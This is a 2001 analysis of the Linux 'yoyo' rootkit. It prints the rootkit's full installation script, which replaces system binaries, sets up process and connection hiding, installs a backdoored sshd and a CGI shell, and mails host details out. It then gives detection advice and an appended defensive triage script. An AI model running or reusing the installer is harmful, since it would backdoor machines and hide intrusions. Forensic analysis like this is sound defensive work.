Date of Analysis : 28/05/01
Author : Fredrik [ press@alldas.de ]
Description: Linux rootkit ( yoyo )

-----[ Disclaimer

Information revealed in this and other analyses is in no way meant to contribute to illegal actions such as hacking or other forms of computer crime. It should serve as an informative source to prevent actions like those mentioned before.

-----[ Introduction

This rootkit was sent to us by an anonymous source. We will try to explain in short terms what a rootkit like this does and how you know if you are infected. The binaries are from the famous Linux rootkit (lrk). (My own comments in "[ ]")

These are the files that come with the rootkit package yoyo.tar.gz (yoyo.tar.gz 515790 bytes) :

fredrik@slaptop:~/analys/.ppp$ ls -al
total 1096
drwxr-xr-x   2 fredrik users   4096 May 26 11:48 ./
drwxr-xr-x   3 fredrik users   4096 May 26 11:48 ../
-rwxr-xr-x   1 fredrik users   4060 Sep 26  1983 citeste*
-rwx------   1 fredrik users     75 Sep 26  1983 clear*
-rwx------   1 fredrik users   2917 May 12 07:05 exec*
-rwxr--r--   1 fredrik users    121 Apr  7 14:15 finger*
-rwx------   1 fredrik users   8268 Sep 26  1983 flood*
-rwxr-xr-x   1 fredrik users  48890 Mar 13 19:34 god*
-rwxr-xr-x   1 fredrik users 632066 Apr  7 15:16 gpm*
-rwxr-xr-x   1 fredrik users  19840 Sep 26  1983 ifconfig*
-rw-r--r--   1 fredrik users   3278 Jan 27 16:11 inetd.conf
-rwxr-xr-x   1 fredrik users  35300 Sep 26  1983 netstat*
-rwxr--r--   1 fredrik users    611 Apr  7 13:42 patch*
-rwxr-xr-x   1 fredrik users  33280 Sep 26  1983 ps*
-rw-r--r--   1 fredrik users    700 May  5 08:24 s
-rw-------   1 fredrik users    540 Oct 22  2000 ssh_host_key
-rw-------   1 fredrik users    512 Oct 22  2000 ssh_random_seed
-rwx------   1 fredrik users   7165 Sep 26  1983 tcp*
-rw-r--r--   1 fredrik users      0 Apr 21 11:06 tcp.log
-rwxr-xr-x   1 fredrik users  53588 Sep 26  1983 top*
-rw-r--r--   1 fredrik users 195637 Jan 14 21:09 wu-ftpd6x.rpm
-rwxr-xr-x   1 fredrik users     72 Apr  7 14:51 xfs*
-rwxr-xr-x   1 fredrik users   4620 Feb 26 16:23 yoyo.cgi*

MD5SUM output

464dc23cac477c43418eb8d3ef087065  citeste
5f22ceb87631fbcbf32e59234feeaa5b  clear
7f08e94c6afda0ece244451775ec5308  exec
51b04922cef6a55df4bb6d30b5ad5af4  finger
4cfae8c44a6d1ede669d41fc320c7325  flood
69cfdfd0632677a37c88ecb6db8a94ac  god
8eebeec972e4f59056dbec6531a82eb1  gpm
086394958255553f6f38684dad97869e  ifconfig
b63485e42035328c0d900a71ff2e6bd7  inetd.conf
2b07576213c1c8b942451459b3dc4903  netstat
e75a34c9570df4bea3d81a8d9afe084b  patch
7728c15d89f27e376950f96a7510bf0f  ps
07287297c42d6b2e917f36d959296033  s
c2c1b08498ed71a908c581d634832672  ssh_host_key
ad265d3c07dea3151bacb6930e0b72d3  ssh_random_seed
6c0f96c1e43a23a21264f924ae732273  tcp
d41d8cd98f00b204e9800998ecf8427e  tcp.log
8ff0939cd49a0b2ef3156c7876afca4b  top
50c11f333641277ab75e6207bffb13b4  wu-ftpd6x.rpm
a798990d214e6700ca6a310b14561142  xfs
202a51b16ac8d1b4dc75de89e7344ed4  yoyo.cgi

-----[ Main

The following is the installation script called "exec" :

#!/bin/sh
unset HISTFILE
    [ Unsetting HISTFILE so no administrator will see our commands ]
clear
chown root.root *
    [ chown'ing all files to root so they always get root with these backdoors ]
echo "[[[-]]] Life.. [[[-]]]"
echo -n "[[[-]]] Porcariile [[[-]]]"
chattr -i /bin/ls
    [ chattr -i so the files can be changed/removed/etc ]
chattr -i /bin/ps
chattr -i /bin/netstat
chattr -i /bin/top
chattr -i /sbin/ifconfig
chattr -i /usr/bin/hdparm
rm -rf /sbin/ifconfig
    [ removing the normal binaries and replacing them with the new ones ]
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
echo "[[[-]]] Done [[[-]]]"
echo -n "[[[-]]] Fisierele Din Dev [[[-]]]"
touch /dev/dsx >/dev/dsx
    [ process hiding file for ps/top. 3 = hide everything containing that string ]
echo "3 citeste" >>/dev/dsx
echo "3 patch" >>/dev/dsx
echo "3 tcp" >>/dev/dsx
echo "3 flood" >>/dev/dsx
echo "3 patch" >>/dev/dsx
echo "3 mech" >>/dev/dsx
echo "3 luckscan-a" >>/dev/dsx
echo "3 luckstatdx" >>/dev/dsx
echo "3 bnc" >>/dev/dsx
echo "3 psybnc" >>/dev/dsx
echo "3 gpm" >>/dev/dsx
echo "3 god" >>/dev/dsx
echo "3 tcp" >>/dev/dsx
touch /dev/caca >/dev/caca
echo "1 194.102.107" >>/dev/caca
    [ netstat hiding file, will hide all connections from 194.102.107 (Intersystems SRL, Romania)
      and incoming connections to the ports 2407, 666, 6667, 5 and outgoing to ports 1711, 54321 ]
echo "1 194.102.107" >>/dev/caca
echo "1 193" >>/dev/caca
echo "3 2407" >>/dev/caca
echo "3 666" >>/dev/caca
echo "3 6667" >>/dev/caca
echo "3 5" >>/dev/caca
echo "4 1711" >>/dev/caca
echo "4 54321" >>/dev/caca
echo
echo
echo "[[[-]]] Done [[[-]]]"
echo "[[[-]]] Directorul home [[[-]]]"
mkdir -p /var/lib/games/.src/
    [ Making secret rootkit dir ]
echo "[[[-]]] Mutam fisierele [[[-]]]"
echo
mv -f inetd.conf finger god patch tcp wu-ftpd6x.rpm clear citeste mech.set flood gpm s ssh_host_key ssh_random_seed /var/lib/games/.src/
    [ moving all files into the rootkit directory ]
touch /var/lib/games/.src/tcp.log
    [ zero'ing out the log file ]
# mv -f inetd.conf /etc
# killall -HUP inetd
echo "[[[-]]] Nice [[[-]]]"
echo "# X Font Server ..." >> /etc/rc.d/rc.sysinit
    [ making the backdoored sshd start at bootup ]
echo "/usr/bin/xfs -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
mv xfs -f /usr/bin/
    [ installing the startup script for the backdoored sshd ]
chmod 500 /usr/bin/xfs
chattr +i /usr/bin/xfs
/usr/bin/xfs
sleep 1
    [ if a www-server is installed they install a cgi backdoor to allow command execution ]
if [ -d /home/httpd/cgi-bin ]
then
    mv -f yoyo.cgi /home/httpd/cgi-bin/
fi
if [ -d /usr/local/httpd/cgi-bin ]
then
    mv -f yoyo.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin ]
then
    mv -f yoyo.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin ]
then
    mv -f yoyo.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
    mv -f yoyo.cgi /www/cgi-bin/
fi
echo "** Luam Informatiile dorite ..."
    [ gathering information about the computer and mailing it to razvantena1@yahoo.com and razvant20@linuxmail.org ]
echo "* Info : $(uname -a)" >> calc
echo "* Hostname : $(hostname -f)" >> calc
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> calc
echo "* Uptime : $(uptime)" >> calc
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> calc
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> calc
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> calc
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> calc
echo "* Spatiu Liber: $(df -h)" >> calc
echo "** Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat calc | mail -s "65289" razvantena1@yahoo.com
cat calc | mail -s "65289" razvant20@linuxmail.org
echo "** Am trimis mailul ... stergem fisierele care nu mai trebuie"
echo "[[[-]]] G * A * T * A [[[-]]]"
cd ..
rm -rf calc rk yoyo.tar.gz
    [ removing traces of the rootkit ]
[ end of installation script ]

fredrik@slaptop:~/analys/.ppp$ strings xfs
[ This script is located in /usr/bin/xfs and it starts the sshd backdoor ]
#!/bin/sh
cd /var/lib/games/.src
./gpm -f ./s
./tcp >> ./tcp.log &
cd /

-----[ File summary

.ppp/ =>
exec            = Installation file.
citeste         = Sorts out the sniffer log made by linsniffer666.
clear           = Kills the sniffer, removes the log and restarts the sniffer.
finger          = Shell script that unpacks psybnc and starts it.
flood           = An old SYN flooder (DoS tool).
god             = Remote exploit for wu-ftpd 2.6.0(1). (source code : http://packetstorm.securify.com/0006-exploits/wuftpd2600.c)
gpm             = Backdoored version of sshd. It listens on port 65289 and takes a magic password to drop a bash shell.
ifconfig        = Trojan which hides promiscuous mode when sniffing.
inetd.conf      = A replacement for /etc/inetd.conf to enable/disable certain services.
netstat         = Netstat trojan to hide connections to/from the local machine. Control file = /dev/caca
patch           = Kills and removes the portmap startup script, and also patches wu-ftpd.
ps/top          = Trojan to hide processes. Control file = /dev/dsx
s               = Server config for the backdoored sshd.
ssh_host_key    = Host key for the backdoored sshd binary (made by root@dil2.datainfosys.net).
ssh_random_seed = File needed by the backdoor.
tcp.log         = Sniffer logfile.
tcp             = A basic linsniffer.
wu-ftpd6x.rpm   = The patched version of wu-ftpd 2.6.0(1).
xfs             = Shell script to start the backdoored sshd.
yoyo.cgi        = CGI script that is placed in the cgi-bin/ dir to allow remote execution of commands.

-----[ Am I infected ? How do I clean up ?

Q: Am I infected ?
A: If the files /dev/caca and /dev/dsx exist you are most likely infected. Also check for file changes and whether the rootkit directory /var/lib/games/.src/ exists. Note that the /bin/ls binary might be trojaned, so you might not see that directory. Check /dev/caca and /dev/dsx first.

Q: How do I clean up ?
A: A total reinstallation would be the best choice. Follow the normal procedures after a penetration.

-----[ Conclusion

This rootkit is developed and compiled for Linux. It seems to be made to backdoor computers that have been compromised by the wu-ftpd 2.6.0(1) exploit. The kit patches that hole and kills the portmapper to deny RPC requests, and it also contains a wu-ftpd 2.6.0 exploit, as mentioned before. Two backdoors are placed on the system: an sshd backdoor that runs on a high port and a CGI command executor (if a www-server is installed). The replacement file for inetd.conf only has telnet and pop3 open; the rest is closed.

Keep all your software up-to-date and follow mailing lists such as Bugtraq. Patch and maintain your server as often as possible and the risk of getting penetrated will be much less.

Thank you for reading.

Fredrik Östergren.
press@alldas.de
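The indicators given in the "Am I infected ?" answer (the /dev/caca and /dev/dsx control files, the /var/lib/games/.src/ directory, the /usr/bin/xfs startup hook) and the control-file formats visible in the installation script in the Main section (/dev/dsx: "3 <string>" hides processes containing the string; /dev/caca: 1 = address prefix, 3 = incoming port, 4 = outgoing port) can be checked with a small triage script run from a clean system over the suspect disk. The script below is an added example written for this analysis; it is not part of the rootkit, of lrk, or of the original text. It takes a root prefix so it can be pointed at a mounted image, the known-bad MD5s are copied from the MD5SUM output above, and the file and function names (yoyo_triage.sh, check_iocs, check_hashes, decode_dsx, decode_caca, triage) are names chosen for this example.

```shell
#!/bin/sh
# yoyo_triage.sh - offline triage for the "yoyo" kit described above.
# Added example for this analysis, not part of the rootkit or the original text.
# Every check takes a root prefix (default "/") so it can be run against a
# suspect disk mounted read-only from a clean system, or against a constructed
# directory tree for testing. A user-space ls trojan like the one in this kit
# only filters its own output; the shell's -e/-f tests use stat() and are not
# affected by it.

# Paths created or modified by the installation script "exec".
YOYO_IOC_PATHS="/dev/dsx /dev/caca /var/lib/games/.src /var/lib/games/.src/tcp.log /usr/bin/xfs"

# "installed path|md5" for the files the kit puts in place, hashes taken from
# the MD5SUM output above. tcp.log's hash is the MD5 of an empty file, so that
# entry only confirms a freshly created, still empty sniffer log.
YOYO_KNOWN_MD5="\
/sbin/ifconfig|086394958255553f6f38684dad97869e
/bin/netstat|2b07576213c1c8b942451459b3dc4903
/bin/ps|7728c15d89f27e376950f96a7510bf0f
/usr/bin/top|8ff0939cd49a0b2ef3156c7876afca4b
/var/lib/games/.src/gpm|8eebeec972e4f59056dbec6531a82eb1
/var/lib/games/.src/tcp|6c0f96c1e43a23a21264f924ae732273
/var/lib/games/.src/tcp.log|d41d8cd98f00b204e9800998ecf8427e"

# check_iocs ROOT - report every known rootkit path present under ROOT and
# the startup hook that "exec" appends to /etc/rc.d/rc.sysinit.
check_iocs() {
    root="${1:-/}"
    for p in $YOYO_IOC_PATHS; do
        if [ -e "$root$p" ]; then echo "IOC path present: $p"; fi
    done
    if [ -f "$root/etc/rc.d/rc.sysinit" ] &&
       grep -q '/usr/bin/xfs -t1 -X53 -p' "$root/etc/rc.d/rc.sysinit"; then
        echo "IOC startup hook: /usr/bin/xfs in /etc/rc.d/rc.sysinit"
    fi
}

# check_hashes ROOT - md5 the replaced binaries and report exact matches.
# A match is conclusive; a non-match proves nothing, since a recompiled kit
# has different hashes.
check_hashes() {
    root="${1:-/}"
    echo "$YOYO_KNOWN_MD5" | while IFS='|' read -r path bad; do
        f="$root$path"
        [ -f "$f" ] || continue
        sum=$(md5sum "$f" | cut -d' ' -f1)
        if [ "$sum" = "$bad" ]; then echo "KNOWN-BAD md5 match: $path ($sum)"; fi
    done
}

# decode_dsx FILE - explain a /dev/dsx control file. The script above uses
# only type 3 ("hide every process whose name contains the string"); any
# other type is reported as unknown rather than guessed at.
decode_dsx() {
    while read -r type arg; do
        [ -n "$type" ] || continue
        case "$type" in
            3) echo "ps/top hide: processes containing '$arg'" ;;
            *) echo "ps/top unknown rule type $type: '$arg'" ;;
        esac
    done < "$1"
}

# decode_caca FILE - explain a /dev/caca control file, using the meanings
# given in the comments above: 1 = address prefix, 3 = local (incoming)
# port, 4 = remote (outgoing) port.
decode_caca() {
    while read -r type arg; do
        [ -n "$type" ] || continue
        case "$type" in
            1) echo "netstat hide: connections with address prefix $arg" ;;
            3) echo "netstat hide: connections to local port $arg" ;;
            4) echo "netstat hide: connections to remote port $arg" ;;
            *) echo "netstat unknown rule type $type: '$arg'" ;;
        esac
    done < "$1"
}

# triage ROOT - run all checks; returns 1 if anything was found, so it can be
# used from a batch over several mounted images.
triage() {
    root="${1:-/}"
    findings=$( { check_iocs "$root"; check_hashes "$root"; } )
    if [ -z "$findings" ]; then
        echo "no yoyo indicators found under $root"
        return 0
    fi
    echo "$findings"
    # If the control files are there, show what the trojaned ps/top and netstat
    # would be hiding, so those processes and connections can be looked for
    # through /proc and from a clean host instead.
    if [ -f "$root/dev/dsx" ];  then decode_dsx  "$root/dev/dsx";  fi
    if [ -f "$root/dev/caca" ]; then decode_caca "$root/dev/caca"; fi
    return 1
}

# Run the triage when invoked as a script: ./yoyo_triage.sh [/mnt/suspect]
case "$0" in *yoyo_triage.sh) triage "$@" ;; esac
```

The hash check is only the second line of evidence: the control files and the rc.sysinit hook are what the installation script always leaves behind, while the MD5s only catch this exact build of the kit. Whatever the script reports, the answer above still stands: reinstall rather than trust a system where ps, netstat, top and ifconfig have been replaced.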